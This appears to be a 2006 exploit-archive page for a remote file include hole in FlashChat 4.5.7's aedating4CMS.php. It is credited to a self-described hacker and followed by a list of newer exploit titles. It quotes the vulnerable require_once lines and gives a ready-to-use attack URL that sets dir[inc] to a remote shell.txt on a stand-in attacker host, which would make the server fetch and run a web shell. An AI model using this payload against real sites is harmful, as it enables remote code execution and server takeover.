exploits , vulnerabilities , articles , FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability

2006-09-04

FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability

Rated as : High Risk

##Night_Warrior<Kurdish Hacker>
##night_warrior-[at]hotmail.com
##FlashChat Remote File Include Vulnerability
##Contact : night_warrior-[at]hotmail.com
##hompage :
##vuln code :
aedating4CMS.php line 13 and 14


require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );


http://www.example.com/[Script
Path]/inc/cmses/aedating4CMS.php?dir[inc]=http://atacker.com/shell.txt?
securitydot.net - 2006-09-04

Exploits - newest 10 RSS | More

2007-06-15 56118 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33414 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41551 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28777 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19310 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16327 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18963 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16208 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33026 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16843 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit